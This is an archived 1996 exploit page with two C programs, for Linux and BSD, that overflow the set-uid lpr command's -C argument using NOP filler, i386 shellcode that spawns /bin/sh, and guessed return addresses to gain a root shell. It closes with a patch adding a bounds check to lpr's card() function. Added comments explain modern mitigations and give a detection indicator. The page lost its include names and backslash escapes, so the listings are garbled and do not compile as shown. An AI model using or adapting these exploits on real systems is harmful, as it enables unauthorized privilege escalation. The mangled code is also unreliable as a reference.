
# Title : BSD and Linux lpr Command Local Root Exploit
# Published : 1996-10-25
# Author : Vadim Kolontsov


-------------------------------------- linux_lpr_exploit.c ----------
#include 
#include 
#include 

#define DEFAULT_OFFSET          50
#define BUFFER_SIZE             1023

/*
 * get_esp - return the current stack pointer (i386 only).
 *
 * There is no C return statement: the inline asm copies %esp into %eax
 * and the i386 calling convention returns integers in %eax, so the value
 * "falls out" of the function.  That is undefined behaviour as C and only
 * works if the compiler does not touch %eax between the asm and the
 * return; it does not work at all on non-x86 or 64-bit targets.
 *
 * NOTE(review): the escape sequences on this page have lost their
 * backslashes (the trailing `n` here, the `x..` bytes in the shellcode
 * strings below), so the listing does not compile as shown.
 */
long get_esp(void)
{
   __asm__("movl %esp,%eaxn");
}

/*
 * main - build an oversized "-C" (job class) argument and exec the
 * set-uid lpr binary with it.
 *
 * lpr's card() copies that argument into a BUFSIZ stack buffer with no
 * length check (see the patch at the end of this page), so the payload
 * below overruns card()'s frame and lpr ends up running the "/bin/sh"
 * embedded in execshell with lpr's privileges.
 *
 * Layout of the heap buffer that becomes argv[3]:
 *   [0x90 filler][execshell][2 x (esp + DEFAULT_OFFSET)][NUL]
 * BUFFER_SIZE (1023) bytes of filler+shellcode, then two copies of the
 * guessed return address, then a terminating NUL — 1032 bytes on a
 * 32-bit target, well inside the 4096 allocated.
 *
 * Each step is defeated by a standard mitigation, which is why this 1996
 * technique does not work as written on a modern system: the bounds
 * check in card() stops the overrun; a non-executable stack stops the
 * filler and shellcode from running; stack protectors catch the
 * clobbered return address; ASLR makes the esp+50 guess miss.  For
 * detection, an lpr invocation whose -C argument is ~1 KiB of 0x90
 * bytes stands out in process-exec auditing.
 *
 * Defects as written: `void main()` is non-standard; exit(0) on malloc
 * failure reports success; `i` (int) is compared with size_t strlen();
 * a (long *) cast is assigned to an unsigned long *; the string
 * literals have lost their backslash escapes.
 */
void main()
{
   char *buff = NULL;
   unsigned long *addr_ptr = NULL;
   char *ptr = NULL;

   /* Position-independent i386 payload; ends in the "/bin/sh" string. */
   u_char execshell[] = "xebx24x5ex8dx1ex89x5ex0bx33xd2x89x56x07"
                        "x89x56x0fxb8x1bx56x34x12x35x10x56x34x12"
                        "x8dx4ex0bx8bxd1xcdx80x33xc0x40xcdx80xe8"
                        "xd7xffxffxff/bin/sh";
   int i;

   buff = malloc(4096);
   if(!buff)
   {
      printf("can't allocate memoryn");
      exit(0);                      /* should be a non-zero status */
   }
   ptr = buff;
   /* Filler (0x90 = NOP) up to BUFFER_SIZE minus the shellcode length. */
   memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
   ptr += BUFFER_SIZE-strlen(execshell);
   /* Append the shellcode byte by byte (memcpy would do). */
   for(i=0;i < strlen(execshell);i++)
      *(ptr++) = execshell[i];
   /* Two copies of the guessed return address; the page does not say
    * why two.  Unaligned long store through a char-derived pointer. */
   addr_ptr = (long *)ptr;
   for(i=0;i<2;i++)
      *(addr_ptr++) = get_esp() + DEFAULT_OFFSET;
   ptr = (char *)addr_ptr;
   *ptr = 0;                       /* terminate so execl sees a C string */
   /* argv = { "lpr", "-C", <payload> }; execl only returns on failure,
    * which is not checked. */
   execl("/usr/bin/lpr", "lpr", "-C", buff, NULL);
}
------------------------------------------- bsd_lpr_exploit.c ------
#include 
#include 
#include 

#define DEFAULT_OFFSET          50
#define BUFFER_SIZE             1023

/*
 * get_esp - return the current stack pointer (i386 only).
 *
 * No C return statement: the inline asm leaves %esp in %eax, which is
 * the i386 integer return register, so the caller reads it from there.
 * Undefined behaviour as C; depends on the compiler leaving %eax alone
 * and on the target being 32-bit x86.
 *
 * NOTE(review): the trailing `n` is a `\n` whose backslash was lost in
 * rendering, as with every other escape on this page.
 */
long get_esp(void)
{
   __asm__("movl %esp,%eaxn");
}

/*
 * main - BSD variant: build an oversized "-C" argument and exec the
 * set-uid lpr with it.
 *
 * Identical structure to the Linux version on this page; only the
 * execshell bytes differ, presumably because BSD's system-call
 * convention differs (the bytes after "/bin/sh" look like argument
 * data, but the page does not decode them — verify before relying on
 * that reading).  The vulnerable copy is lpr's card(); the patch at the
 * end of this page adds the missing bounds check.
 *
 * Buffer layout written into the 4096-byte allocation:
 *   [0x90 filler][execshell][2 x (esp + DEFAULT_OFFSET)][NUL]
 * = BUFFER_SIZE + 2*sizeof(long) + 1 bytes.
 *
 * Mitigations that break this as written: the card() length check,
 * non-executable stack, stack protector, ASLR.  lpr with a -C argument
 * consisting mostly of 0x90 bytes is an easy audit-log indicator.
 *
 * Defects as written: non-standard `void main()`; exit(0) on failure;
 * int/size_t comparison in the copy loop; (long *) assigned to
 * unsigned long *; lost backslash escapes in the string literals.
 */
void main()
{
   char *buff = NULL;
   unsigned long *addr_ptr = NULL;
   char *ptr = NULL;

   /* BSD i386 payload; contains the "/bin/sh" string. */
   char execshell[] =
   "xebx23x5ex8dx1ex89x5ex0bx31xd2x89x56x07x89x56x0f"
   "x89x56x14x88x56x19x31xc0xb0x3bx8dx4ex0bx89xcax52"
   "x51x53x50xebx18xe8xd8xffxffxff/bin/shx01x01x01x01"
   "x02x02x02x02x03x03x03x03x9ax04x04x04x04x07x04";

   int i;

   buff = malloc(4096);
   if(!buff)
   {
      printf("can't allocate memoryn");
      exit(0);                      /* should be a non-zero status */
   }
   ptr = buff;
   /* 0x90 (NOP) filler up to BUFFER_SIZE minus the shellcode length. */
   memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
   ptr += BUFFER_SIZE-strlen(execshell);
   /* Append the shellcode byte by byte. */
   for(i=0;i < strlen(execshell);i++)
      *(ptr++) = execshell[i];
   /* Two copies of the guessed return address (unaligned long stores). */
   addr_ptr = (long *)ptr;
   for(i=0;i<2;i++)
      *(addr_ptr++) = get_esp() + DEFAULT_OFFSET;
   ptr = (char *)addr_ptr;
   *ptr = 0;                       /* NUL-terminate the argument */
   /* execl returns only on failure; the return value is not checked. */
   execl("/usr/bin/lpr", "lpr", "-C", buff, NULL);
}
--------------------------------------------------------------------------

  Here is a small patch -- see file lpr.c, function card():
(lines marked "/* !! */" are the added ones)

--------------------------------------------------------------------------
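/*
 * card - append one control-file "card" (a tag character followed by a
 * single line of text) to the control file open on the global `tfd`.
 *
 * c  : the card's tag character, written first.
 * p2 : NUL-terminated text; embedded newlines are replaced by spaces so
 *      the card stays on one line.
 *
 * The card is staged in a BUFSIZ stack buffer: one byte for the tag, the
 * text, then a trailing newline.  Text longer than BUFSIZ-2 bytes cannot
 * fit and is rejected before anything is copied.  This is the bounds
 * check whose absence the lpr exploits on this page rely on: lpr runs
 * set-uid, and the unchecked copy let the "-C" argument overrun `buf`
 * and overwrite card()'s saved return address.
 *
 * On oversize input the process exits with status 1 (message goes to
 * stderr so it cannot be mistaken for output).  The return value of
 * write() is not checked, as in the original.
 */
static void card(int c, char *p2)
{
        char buf[BUFSIZ];
        char *p1 = buf;
        size_t len = 2;                 /* tag byte + trailing newline */
        size_t text_len = strlen(p2);

        /* Reject anything that would overrun buf (tag + text + '\n'). */
        if (text_len > BUFSIZ - 2) {
                fprintf(stderr, "No, thanks...\n");
                exit(1);
        }
        *p1++ = (char)c;
        while ((c = *p2++) != '\0') {
                /* A newline would start a new card; flatten it. */
                *p1++ = (c == '\n') ? ' ' : (char)c;
                len++;
        }
        *p1++ = '\n';
        write(tfd, buf, len);
}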

